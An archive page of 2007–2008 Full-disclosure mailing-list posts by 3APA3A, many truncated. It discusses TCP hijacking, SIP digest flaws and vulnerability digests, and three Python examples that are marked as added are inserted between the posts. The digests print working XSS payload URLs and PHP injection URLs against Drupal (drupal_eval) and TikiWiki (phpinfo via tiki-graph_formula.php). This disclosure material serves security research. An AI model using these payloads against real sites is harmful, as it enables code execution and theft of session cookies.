cfcf> Recently on opening one of my sites, my antivirus pops up saying that it
cfcf> has found a malicious script. The URL is random and I have managed to
cfcf> get that script. It is using some flaw in Apple QuickTime.
cfcf> You can get the zip file for the JavaScript here:
cfcf> http://secgeeks.com/what.zip
cfcf> password is 12345
cfcf> can somebody guide/help me what is this and how can I remove it?



-- 
~/ZARAZA http://securityvulns.com/
Firing a second time, he crippled a bystander. The bystander was me. (Twain)


[Full-disclosure] securityvulns.com russian vulnerabilities digest

2008-01-03 Thread 3APA3A
ds/2007/MoBiC/WP-ContactForm%20CSRF8.html
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

 Original article (in Russian):
  http://securityvulns.ru/Sdocument667.html
  http://securityvulns.ru/Sdocument546.html
 Additional details (in Ukrainian):
  http://websecurity.com.ua/1641/
  http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 cross-site scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument625.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1442/


6. ExpressionEngine <= 1.2.1 response splitting and cross-site scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument472.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1454/
 
-=-=-=-

 There  are  also  few vulnerabilities published in English as a part of
 the Month of Bugs in CAPTCHA:
 
Cryptographp <= 1.2 WordPress plugin multiple persistent cross-site
scriptings

 Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

 Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

 Original article: http://websecurity.com.ua/1588/
 

 
-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



[Full-disclosure] multiple CAPTCHA automation test bypass digest

2008-01-03 Thread 3APA3A
ss CAPTCHA.

The vulnerability is reported in the reCaptcha plugin for Drupal, but
according to the reCaptcha developers, the vulnerability is in Drupal code.

Original article: http://websecurity.com.ua/1505/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt



   
-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/


Re: [Full-disclosure] HP Photosmart vulnerabilities

2007-12-28 Thread 3APA3A
Dear [EMAIL PROTECTED],

SNMP is used to monitor printing queue status with the LPR or RAW printing
protocol. This is a standard feature in e.g. Windows and is not HP
specific. You can find this option in the port settings.

--Friday, December 28, 2007, 7:01:40 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

uhc> A low price for the printer does not give the vendor a free pass 
uhc> for shipping insecure products.  Since this type of printer is 
uhc> targeted for home/home office use, it would be valid to ask why 
uhc> SNMP is enabled in the first place.  

uhc> Please explain how this printer would be any less easy to use if HP
uhc> had used non default community strings in the firmware?  In a 
uhc> home/home office environment, the only thing that might have a 
uhc> valid need to communicate with the printer via SNMP would be HP's 
uhc> software, which could just as easily use a non default community 
uhc> string.


uhc> On Fri, 28 Dec 2007 09:32:29 -0600 Joshua Levitsky 
uhc> <[EMAIL PROTECTED]> wrote:
>>Do you mean to tell me someone can come to my house and after I let
>>them on my network they can see how soon I need toner? Oh crap I
>>better not let anyone over for New Year's!!!
>>
>>There is a reason it's a $200 home/home office printer. It's not meant
>>to sit on the internet. It's not meant to be in a military facility.
>>It is meant to be simple to use.
>>
>>I think next I shall contact Sears because I suspect someone can steal
>>my water by simply placing a glass up to the front of the fridge
>>without my knowledge, and I'm not positive but I think they can take
>>my ice as well.
>>
>>
>>
>>On Dec 28, 2007, at 10:16 AM, <[EMAIL PROTECTED]> wrote:
>>
>>> HP Photosmart C6280 (and probably other) network printers ship with
>>> insecure default settings.  The printer ships with SNMP enabled
>>> using the default community strings for both public and private.
>>> HP does not document the use of SNMP, or provide a way for users to
>>> change the default community strings.  The printer also includes a
>>> web based admin tool which runs over http, without even an option
>>> for ssl.
>>>
>>> Several attempts to contact HP have proven futile.
>>>
>>



-- 
~/ZARAZA http://securityvulns.com/
While you are in the hands of providence, you will not manage to die before your time. (Twain)


Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

2007-10-26 Thread 3APA3A
Dear [EMAIL PROTECTED],


VKve> Thank you, Captain Obvious - I specifically *said* that only one of them
VKve> needs to be blind spoofing.

There is a difference between "you needn't", "you can't" and "you
won't". You say you needn't spoof the other one. I say you won't and you
can't.

VKve> And Michael Zalewski's work showed that even on many boxes that *claim*
VKve> to have RFC1948 randomization, you can do pretty well on the predicting.

I'm afraid you are misunderstanding or misinterpreting the results of
Michael Zalewski's work (which is, by the way, the last real "hack" in the
initial meaning of this word in the field of computer security). In most
cases, you have a good probability of guessing the SN after some number
of guesses. E.g. for Windows NT 4 you have 100% probability after 5000
guesses. There is no OS with 100% or even 50% probability after 1 guess.
And you have to remember that the result of the guess is not known to
you immediately, because you are spoofing blindly.

-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

2007-10-26 Thread 3APA3A
Dear [EMAIL PROTECTED],

During blind TCP spoofing you can send data, but you cannot receive it.
That's why it's blind. The general idea is to insert some data, e.g.
commands into a telnet session or an HTTP request, into an established
TCP connection. Usually, you have only one packet to insert, because,
after the connection is spoofed, the sequence numbers go out of order
and the hijacked side will reply with RST (unless you can blindly guess
both sequence numbers and predict the moment the other side will send
some data with an accuracy of approximately 100ms. In this case both
sides can consider the extra packet a duplicate and ignore it).

So, generally, 1. there is no reason to spoof both connections. 2. it's
only possible if the sequence number is 100% (or close to 100%)
predictable.

--Friday, October 26, 2007, 1:14:23 AM, you wrote to [EMAIL PROTECTED]:

VKve> On Fri, 26 Oct 2007 00:43:10 +0400, 3APA3A said:

>>  Randomized ISN doesn't protect against MitM.

VKve> Doing  a  MitM  is  basically just spoofing two connections at the
VKve> same  time. If you know how to do one, you know how to do two. And
VKve> if  you  know  how  to do one of them *blind*, it vastly increases
VKve> your  options  (as  you only need to be able to see the traffic in
VKve> one direction rather than both).





-- 
~/ZARAZA http://securityvulns.com/
Even if you do get some letter, you still won't be able to read it.
(Twain)

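The blind-guessing arithmetic in the two TCP replies above (one spoofed packet per candidate sequence number, no feedback about which one hit) as an added worked example, not code from the thread or from Zalewski's study: a small Python model that compares a constructed counter-like ISN generator with a properly random one. The generator parameters (64000 base increment, up to 1000 of jitter) are assumptions chosen only to show the "certain after a few thousand guesses, hopeless after one" behaviour; they are not measurements of any real OS.

```python
"""Added example (not from the thread): how much a predictable ISN generator
helps a blind spoofer, compared with a randomised one."""
import random
import statistics

MOD = 1 << 32  # TCP sequence numbers are 32-bit


class CounterISN:
    """Constructed model of a weak generator: each new connection gets the
    previous ISN plus a large constant plus a little jitter. Not a model of
    any particular OS (assumed parameters)."""

    def __init__(self, rng, base=64000, jitter=1000):
        self.rng, self.base, self.jitter = rng, base, jitter
        self.cur = rng.randrange(MOD)

    def next(self):
        self.cur = (self.cur + self.base + self.rng.randint(0, self.jitter)) % MOD
        return self.cur


class RandomISN:
    """Model of a properly randomised generator."""

    def __init__(self, rng):
        self.rng = rng

    def next(self):
        return self.rng.randrange(MOD)


def isn_deltas(isns):
    return [(b - a) % MOD for a, b in zip(isns, isns[1:])]


def predict_next(isns):
    """Attacker side: open a few real connections, observe the ISNs, then
    extrapolate the typical increment onto the next (spoofed) connection."""
    step = int(statistics.median(isn_deltas(isns)))
    return (isns[-1] + step) % MOD


def circular_distance(a, b):
    d = (a - b) % MOD
    return min(d, MOD - d)


def hit_within(prediction, actual, guesses):
    """True if the real ISN lies inside a block of `guesses` consecutive
    values centred on the prediction, i.e. spraying that many blind packets
    (one per candidate) would have included the right one. The attacker never
    learns which packet hit; it only sees whether the side effect happened."""
    return circular_distance(prediction, actual) <= guesses // 2


def hit_rate(make_gen, observed=4, guesses=5000, trials=200, seed=1):
    """Fraction of trials in which the attacker's block of guesses contains
    the victim's next ISN. Deterministic for a given seed."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        gen = make_gen(rng)
        isns = [gen.next() for _ in range(observed)]
        actual = gen.next()
        if hit_within(predict_next(isns), actual, guesses):
            hits += 1
    return hits / trials


if __name__ == "__main__":
    for name, gen in (("counter-like", CounterISN), ("random", RandomISN)):
        print(f"{name:13s} 1 guess: {hit_rate(gen, guesses=1):.3f}   "
              f"5000 guesses: {hit_rate(gen, guesses=5000):.3f}")
```

With the counter-like generator the 5000-guess block always contains the next ISN, while a single guess almost never does; with the random generator even 5000 guesses cover about one part in a million of the space. That is the difference between "needs many packets but works" and "does not work", and the attacker sends all those packets without ever seeing an answer.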

Re: [Full-disclosure] TCP Hijacking (aka Man-in-the-Middle)

2007-10-25 Thread 3APA3A



 Valdis, you should go back to the Cretaceous period, because Oliver talks
 about a man-in-the-middle attack, not about blind TCP spoofing.
 Randomized ISN doesn't protect against MitM.

--Thursday, October 25, 2007, 9:40:53 PM, you wrote to [EMAIL PROTECTED]:

VKve> On Thu, 25 Oct 2007 10:09:47 PDT, Oliver said:

>> I have been searching all over the place to find an answer to this question,
>> but Google has made me feel unlucky these last few days. I hope I could find
>> more expertise here. The burning question I have been pondering over is -
>> could TCP connections be hijacked both ways?

VKve> Quick summary:

VKve> Steve Bellovin pointed out the issue. 19

VKve> Kevin Mitnick exploited it. 19

VKve> Steve wrote RFC1948, which basically said "Use randomized ISNs so the 
attacker
VKve> has to work harder at it". 1996.

VKve> A lot of vendors sort of implemented it. 1996-2000.

VKve> Michael Zalewski did a nice phase-space analysis and showed a lot of 
vendors
VKve> botched it. http://lcamtuf.coredump.cx/oldtcp/tcpseq.html 2000

VKve> A lot of vendors fixed their shit, but a lot didn't.
VKve> http://lcamtuf.coredump.cx/newtcp/ 2001.

VKve> You're now caught up to 6 years ago.


-- 
~/ZARAZA http://securityvulns.com/
Still, the most important thing is the algorithm! (Lem)


[Full-disclosure] 3proxy 0.5.3j released (bugfix)

2007-10-23 Thread 3APA3A

3proxy (http://3proxy.ru/) is a multi-platform (Windows, Linux, Unix)
multi-protocol proxy server with the ability to manage traffic flows and
bandwidth, convert requests between different proxy types, authenticate,
authorize, control, limit and account user access, and more.

3proxy version 0.5.3j was released to address a double free()
vulnerability in the FTP proxy module (ftppr) reported by Venustech AD-LAB
(CVE-2007-5622). Vulnerable 3proxy versions are 0.5 - 0.5.3i. The current
branch (0.6) is not affected.

3proxy 0.5.3j can be downloaded from http://3proxy.ru/download/

Because of a programming error resulting in a double free() during the
handling of the "OPEN" FTP proxy request, it may be possible to crash the
3proxy service by repeating this request. Reliable code execution doesn't
seem possible.

FTP proxy is a special non-standard (no RFC specification) type of proxy
server with an extended RFC 959 command set, compatible with only a few
graphical FTP clients. It's not compatible with browsers, because browsers
use a different kind, FTP over HTTP proxy. FTP proxy is not commonly used.

The vulnerability requires the 'ftppr' service to be manually enabled in
the 3proxy configuration file or the special 'ftppr' application to be
executed. No other services (SOCKS, HTTP including FTP over HTTP proxy,
POP3, TCP and UDP portmapping, etc) are affected.

The vulnerability is of pre-authentication type, but, because the FTP
proxy in the 3proxy 0.5x branch doesn't support reverse proxying, it should
never be accessible from the Internet. A web scenario with exploitation
through a legitimate client is also impossible. Under a typical
configuration, the scope of this vulnerability is limited to the local
network.
  

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread 3APA3A
Dear Paul Szabo,

 Messages like this that I've got are PDF spam without any attempt to
 exploit anything, and have been spammed since July. Not sure about this
 one though.

--Tuesday, October 23, 2007, 4:18:52 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

PS> In case you are interested... messages like the following were spammed
PS> to my users tonight.



-- 
~/ZARAZA http://securityvulns.com/
By the bald head of the prophet Moses, I am going to eat you right now. (Twain)


Re: [Full-disclosure] CallManager and OpeSer toll fraud and authentication forward attack

2007-10-15 Thread 3APA3A
Dear Radu State,

 As far as I understood the issue, it requires an active Man-in-the-Middle
 attack. Digest authentication, like any authentication without traffic
 encryption or traffic signing, doesn't protect against an active M-i-t-M,
 because an active M-i-t-M can always force the client to use basic
 authentication or hijack the session after authentication is finished.
 This is, no doubt, a security issue, but its scope is limited to
 configurations where the client is configured not to allow cleartext
 authentication, or where the attacker can sniff traffic but cannot spoof
 the server reply.

--Friday, October 12, 2007, 8:54:18 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

RS> MADYNES Security Advisory : SIP toll fraud and authentication forward attack

RS> Date of Discovery 5  May, 2007

RS> Vendor1 (Cisco) was informed on 22 May 2007

RS> Vendor 2 (OpenSer,  voice-systems) was informed in 4 th October 2007

RS> ID: KIPH11 

RS> Affected products

 

RS> CallManager:

RS> System version: 5.1.1.3000-5 

RS> Administration version: 1.1.0.0-1

 

RS> OpenSer

 

RS> SVN version until the 4 th October 2007

RS> Version 1.2.2

 

 

RS> Summary 

 

 

RS> The tested systems do not associate a Digest authentication with a dialog,
RS> which allows any user who can sniff the traffic to make their own calls on
RS> behalf of the sniffed device.


RS> Synopsis

RS> The tested implementations do not check whether the URI provided in the
RS> Digest authentication header is the same as the Request-URI of the
RS> message, which allows an attacker to call any other extension. This is not
RS> a simple replay attack.

RS> They do not generate one-time nonces. These issues allow a malicious user
RS> able to sniff a Digest authentication from a regular user to call (by
RS> spoofing data) any extension on behalf of the user, as long as the nonce
RS> does not expire.

RS> The first vendor   (Cisco) was informed  in May 2007 and acknowledged the
RS> vulnerability. The second vendor (OpenSer, voice-systems) was informed in
RS> October 2007 and fixed the vulnerabity on the same day.

RS>  This vulnerability was identified by the Madynes research team at INRIA
RS> Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
RS> vulnerabilities published where advanced state tracking is required.

RS> Background 

RS> *   SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
RS> signalling. SIP is ASCII based; an INVITE message is used to initiate and
RS> maintain a communication session.



RS> Impact :


RS> A malicious user can perform toll fraud and caller ID spoofing.


RS> Resolution



RS> OpenSer fixed the issue on the 4 th October.  

 

RS> The devel branch was enhanced to export a variable $adu which refer to this
RS> field. It is easy now to check in config file whether it is equal or not
RS> with r-uri:

 

RS> if($adu != $ru)

RS> {

RS> # digest uri and request uri are different 

RS> }

 


RS> Credits

RS> *   Humberto J. Abdelnur (Ph.D Student) 
RS> *   Radu State (Ph.D) 
RS> *   Olivier Festor (Ph.D) 


RS> This vulnerability was identified by the Madynes research team at INRIA
RS> Lorraine, using the Madynes VoIP fuzzer KIF

 

RS> POC: PoC code is available on request

 

 

 



-- 
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set forth only so that they be
understood and believed. (Twain)

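The two missing checks in the quoted advisory (the digest URI must equal the Request-URI, and a nonce must authorize only one request), as an added example that is not code from the advisory, from Cisco or from OpenSER: a toy SIP Digest verifier in Python that replays a sniffed Authorization header onto an INVITE with a different Request-URI, once with both checks off (the behaviour the advisory describes) and once with them on. User, realm, password, nonce handling and the Request-URIs are constructed; the response computation is the qop-less MD5 Digest of RFC 2617 / RFC 3261.

```python
"""Added example (not part of the original thread): a minimal SIP Digest
verifier showing the two checks the advisory says were missing."""
import hashlib
import hmac
import re
import secrets


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce):
    """RFC 2617 / RFC 3261 Digest response without qop: MD5(HA1:nonce:HA2).
    Note that HA2 covers the `uri` parameter of the header, not the
    Request-URI of the message: that is exactly why the server must compare
    the two itself."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_authorization(user, realm, password, method, uri, nonce):
    """What a legitimate phone sends back after a 401/407 challenge."""
    resp = digest_response(user, realm, password, method, uri, nonce)
    return (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}", algorithm=MD5')


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest(header):
    if not header.startswith("Digest "):
        raise ValueError("not a Digest header")
    return {k: (quoted or bare) for k, quoted, bare in _PARAM.findall(header[7:])}


class SipProxy:
    """Toy server. bind_uri / one_time_nonce switch the two hardening checks
    on or off; both off is the behaviour the advisory describes."""

    def __init__(self, realm, users, bind_uri=True, one_time_nonce=True):
        self.realm, self.users = realm, users
        self.bind_uri, self.one_time_nonce = bind_uri, one_time_nonce
        self.issued, self.used = set(), set()

    def challenge(self):
        nonce = secrets.token_hex(16)
        self.issued.add(nonce)
        return nonce

    def authorize(self, method, request_uri, auth_header):
        p = parse_digest(auth_header)
        password = self.users.get(p.get("username"))
        if password is None or p.get("realm") != self.realm:
            return "401 unknown user"
        nonce = p.get("nonce")
        if nonce not in self.issued:
            return "401 unknown nonce"
        expected = digest_response(p["username"], self.realm, password,
                                   method, p.get("uri", ""), nonce)
        if not hmac.compare_digest(expected, p.get("response", "")):
            return "401 bad response"
        # Check 1: the URI the client signed must be the URI it is calling.
        if self.bind_uri and p.get("uri") != request_uri:
            return "403 digest uri does not match Request-URI"
        # Check 2: a nonce may authorize exactly one request.
        if self.one_time_nonce:
            if nonce in self.used:
                return "401 nonce already used"
            self.used.add(nonce)
        return "200 OK"


def toll_fraud_scenario(hardened):
    """Alice places a legitimate call; an eavesdropper replays her
    Authorization header on an INVITE to a different destination.
    Returns (result of Alice's INVITE, result of the attacker's INVITE)."""
    proxy = SipProxy("example.com", {"alice": "s3cret"},
                     bind_uri=hardened, one_time_nonce=hardened)
    nonce = proxy.challenge()
    alice_uri = "sip:bob@example.com"
    header = build_authorization("alice", "example.com", "s3cret",
                                 "INVITE", alice_uri, nonce)
    legit = proxy.authorize("INVITE", alice_uri, header)
    # Attacker sniffed `header`; only the Request-URI of the INVITE changes.
    fraud = proxy.authorize("INVITE", "sip:premium@example.com", header)
    return legit, fraud


if __name__ == "__main__":
    print("as described in advisory:", toll_fraud_scenario(hardened=False))
    print("with both checks:        ", toll_fraud_scenario(hardened=True))
```

The unhardened proxy accepts the replayed header because the MD5 response still verifies (it was computed over the header's own uri parameter), which is the toll-fraud case; the hardened one refuses on the URI mismatch, and even a replay to the original URI would be refused the second time by the one-time-nonce rule.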

Re: [Full-disclosure] Microsoft Windows default ZIP handler bug

2007-10-15 Thread 3APA3A
Dear Kristian Erik Hermansen,

Cannot reproduce it on patched Windows XP. Maybe it's the DynaZIP library
buffer overflows fixed with MS04-34.

--Monday, October 15, 2007, 12:19:31 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

KEH> I tested this on three Windows XP machines and was able to make them
KEH> all crash.  There is an issue with the way Microsoft's default

-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] Tikiwiki 1.9.8 exploit ITW

2007-10-12 Thread 3APA3A
Dear Moritz Naumann,

This vulnerability was found by ShAnKaR

http://securityvulns.ru/Sdocument162.html

and reported on Bugtraq yesterday (see the "Vulnerabilities digest"
message). TikiWiki developers were informed on October 8.

--Friday, October 12, 2007, 1:20:06 AM, you wrote to 
full-disclosure@lists.grok.org.uk:


MN> Disabling url_fopen() or denying access to tiki-graph_formula.php for
MN> unauthenticated users will prevent your site from being exploited.

MN> I've notified the developers.

MN> If, what it says on http://dev.tikiwiki.org/Security is up to date (i.e.
MN> unfixed security issues of high priority initially reported 9 months
MN> ago), then you really should not use this software.

-- 
~/ZARAZA http://securityvulns.com/
Man is a mystery... I occupy myself with this mystery in order to be a man. (Dostoevsky)


[Full-disclosure] Vulnerabilities digest

2007-10-10 Thread 3APA3A
essage%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According to the author, it's possible to execute script in both the
local zone and the context of the gopher site.

12. ShAnKaR reports a PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.

Example: 
http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports a PHP injection vulnerability in TikiWiki 1.9.8.

Example: 
http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

Original message (in Russian):

http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html










  

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



Re: [Full-disclosure] URI handling woes in Acrobat Reader, Netscape, Miranda, Skype

2007-10-08 Thread 3APA3A
Dear Thierry Zoller,



--Saturday, October 6, 2007, 9:06:51 PM, you wrote to [EMAIL PROTECTED]:

TZ> Dear Geo.,

G>> If the application is what exposes the URI handling routine to untrusted
G>> code from the internet,
TZ> Sorry, Untrusted code from the internet ?

TZ> The user clicks on a mailto link, is that untrusted code?
TZ> Or the mailto link is clicked for him.

What a URL is is defined by RFC 1738; what mailto: is is defined by RFC
2368. The string in question is definitely _not_ a URL because of the %xx
and ". A double quote is a URL delimiter and is not a part of the URL; in
this case the application incorrectly parses and highlights the URL (it
should stop before "). %xx is invalid character encoding. And altogether
it's, for sure, not a mailto: URL. Passing unchecked user input to a
function called ShellExecute(), where a URL is expected, is a bug.

So, while there is a security vulnerability in Windows, there is also a
security vulnerability in mIRC, Acrobat Reader, Netscape, Miranda and
Skype, because ShellExecute() behaviour is not defined for the case where
non-URL data is passed to the URL processor.

-- 
~/ZARAZA http://securityvulns.com/


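The check argued for above (do not pass anything that is not a URL to the URL handler), as an added Python example that is not code from any of the applications named: a URL extractor that stops at the first character which cannot be part of a URL, such as a double quote, and a whole-string validator that rejects incomplete %xx escapes, schemes outside an allow-list, and mailto: bodies that contain no address. The scheme allow-list and the inputs used in the checks are assumptions constructed for the example.

```python
"""Added example (not from the thread): treat a string as a URL only if it is
one, before handing it to a URL handler such as ShellExecute()."""
import re

# Schemes this handler is willing to pass on (assumption: tune per application).
SAFE_SCHEMES = ("http", "https", "ftp", "mailto")

# Characters RFC 1738 lets appear literally in a URL (unreserved + reserved).
# Anything else, notably '"', space, '<' and '>', ends the URL; '%' is allowed
# only as a complete %XX escape. '~' is added because real URLs use it (RFC 2396).
_URL_CHARS = r"A-Za-z0-9$\-_.+!*'(),;/?:@=&~"
_URL_RE = re.compile(
    r"[A-Za-z][A-Za-z0-9+.\-]*:(?:[" + _URL_CHARS + r"]|%[0-9A-Fa-f]{2})+"
)
# RFC 2368 mailto: one or more addr-specs, optionally followed by ?headers.
_MAILTO_BODY_RE = re.compile(r"[^@?]+@[^@?]+(?:,[^@?]+@[^@?]+)*(?:\?.*)?")


def extract_url(text):
    """Return the first maximal URL-shaped run in `text`, stopping at the first
    character that cannot be part of a URL (this is where a highlighter should
    stop linking). None if there is no such run."""
    m = _URL_RE.search(text)
    return m.group(0) if m else None


def is_valid_url(s):
    """Whole-string check used before the string reaches the URL handler:
    syntactically a URL, an allow-listed scheme and, for mailto:, a body that
    is actually an address list."""
    if not _URL_RE.fullmatch(s):
        return False
    scheme, body = s.split(":", 1)
    scheme = scheme.lower()
    if scheme not in SAFE_SCHEMES:
        return False
    if scheme == "mailto":
        return _MAILTO_BODY_RE.fullmatch(body) is not None
    return True


def url_for_handler(s):
    """What the application should hand to the OS: the string itself if it is
    a valid URL, otherwise nothing at all."""
    return s if is_valid_url(s) else None


if __name__ == "__main__":
    # Constructed inputs: a good mailto:, one with a stray quote and a broken
    # escape, and text in which a highlighter must stop at the quote.
    for sample in ("mailto:user@example.com", 'mailto:test%"x.cmd'):
        print(repr(sample), "->", url_for_handler(sample))
    print(extract_url('see mailto:a@b.com" and more'))
```

The two functions do different jobs: extract_url is what the link highlighter should use, so the clickable span ends before the quote; is_valid_url is the gate in front of the handler, so a string that survived extraction but is still not a URL (a bare "%" followed by non-hex, an unlisted scheme, a mailto: with no address) is never executed.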


Re: [Full-disclosure] iDefense Security Advisory 10.02.07: Sun Microsystems Solaris FIFO FS Information Disclosure Vulnerability

2007-10-04 Thread 3APA3A
Dear iDefense Labs,

--Wednesday, October 3, 2007, 6:32:03 PM, you wrote to [EMAIL PROTECTED]:


iL> The vulnerability exists in the kernel ioctl() handler for FIFOs. The
iL> I_PEEK ioctl is used to peek at a number of bytes contained in the FIFO
iL> without actually removing them from the queue. One of the arguments to
iL> this command, which represents the number of bytes to peek, is a signed
iL> integer value. Since this parameter is not properly validated, a
iL> negative value can cause large amounts of kernel memory to be leaked.

Can you please clarify this issue? According to the subject it looks like
an information leak (information disclosure) issue, while according to
the description it looks more like a memory leak (Denial of Service)
issue.


-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)

2007-09-21 Thread 3APA3A
Dear Panda Security Response,


 [EMAIL PROTECTED] was contacted about this same vulnerability in
 Panda Antivirus 2007 on August 11, 2006 (more than a year ago) without
 any results or response, until the information was published on Bugtraq.

 As far as I can see, pandasecurity.com is the Swedish domain of Panda
 while pandasoftware.com is the international one. I believe it's quite
 reasonable to have [EMAIL PROTECTED] forwarded to
 [EMAIL PROTECTED], don't you think so?


--Thursday, September 20, 2007, 12:58:42 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

 

PSR> Users of vulnerable 2007 versions should upgrade to Panda Antivirus
PSR> 2008 and apply the fix provided.



PSR> For future vulnerability reporting to Panda please write specifically
PSR> and exclusively to "Panda Security Response"
PSR> <[EMAIL PROTECTED]> instead of generic beta or informational
PSR> contact mailboxes.



PSR> blog:  http://research.pandasoftware.com

-- 
~/ZARAZA http://securityvulns.com/
Yes, he was devilishly lucky. What a rotten time he would have had if he had survived! (Twain)


Re: [Full-disclosure] [USN-515-1] t1lib vulnerability

2007-09-21 Thread 3APA3A
Dear Kees Cook,

CVE-2007-4033  is  "Buffer  overflow  in php_gd2.dll in the gd (PHP_GD2)
extension  in  PHP  5.2.3  allows context-dependent attackers to execute
arbitrary code via a long argument to the imagepsloadfont function."

Please, provide valid CVE entry.

--Thursday, September 20, 2007, 12:18:02 AM, you wrote to [EMAIL PROTECTED]:

KC> === 
KC> Ubuntu Security Notice USN-515-1 September 19, 2007
KC> t1lib vulnerability
KC> CVE-2007-4033
KC> ===


-- 
~/ZARAZA http://securityvulns.com/
Sir Isaac Newton discovered an apple falling to the ground (Mark Twain)



Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory

2007-08-27 Thread 3APA3A
Dear [EMAIL PROTECTED],

Either the Subject "UPX parsing Arbitrary CodeExecution" or the
vulnerability description "Infinite Loop in UPX packed files parsing" is
wrong. Can you provide more detailed information please? It's not clear
how an infinite loop can lead to remote code execution.

--Friday, August 24, 2007, 11:15:01 PM, you wrote to [EMAIL PROTECTED]:


snc> Description:

snc> A remotely exploitable vulnerability has been found in the file parsing
snc> engine.

snc> In detail, the following flaw was determined:

snc> - Infinite Loop in UPX packed files parsing


snc> Impact:

snc> This problem can lead to remote denial of service or arbitrary code
snc> execution if an attacker carefully crafts a file that exploits the
snc> aforementioned vulnerability. The vulnerability is present in Sophos
snc> Anti-virus software listed above on all platforms supported by the affected
snc> products prior to the engine Version 2.48.0. 


-- 
~/ZARAZA http://securityvulns.com/




[Full-disclosure] Vulnerabilities digest

2007-08-21 Thread 3APA3A
Dear [EMAIL PROTECTED],

  there are a number of vulnerabilities not yet published in English

  1. Dmitry Zubov reports a Planet VC-200M VDSL2 router administration
  interface DoS vulnerability.

  An HTTP request with a missing Host: header prevents administration
  interface access until reboot. The vendor was reportedly contacted, but
  failed to react.

  SecurityVulns issue: http://securityvulns.com/news/Planet/VC-200M/DoS.html
  Original message (in Russian): http://securityvulns.ru/Rdocument847.html

  2. MustLive reports a low-risk (requires social engineering), yet
  interesting example of cross-site scripting in Internet Explorer. Local
  zone scripting is possible on accessing a saved page with the original
  URL in the form of

  http://site/-->[script]alert("XSS")[/script]

  Internet Explorer 6.0 was tested.

  SecurityVulns Issue: http://securityvulns.com/news/Microsoft/IE/saved-css.html
  Additional Information (in Ukrainian): http://websecurity.com.ua/1241/
  Original message (in Russian): http://securityvulns.ru/Rdocument865.html

  3. MustLive reports a cross-site scripting vulnerability in Search Engine
  Builder.

  Request
  
http://site/search/search.html?searWords=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  leads to cross-site scripting.

  Additional information (in Ukrainian): http://websecurity.com.ua/1159/
  Original message (in Russian): http://securityvulns.ru/Rdocument843.html

  4. MustLive reports a vulnerability in the Sirius 1.0, Blix 0.9.1 and
  Blix 0.9.1 Rus, Pool 1.0.7 themes for WordPress and also the WordPress
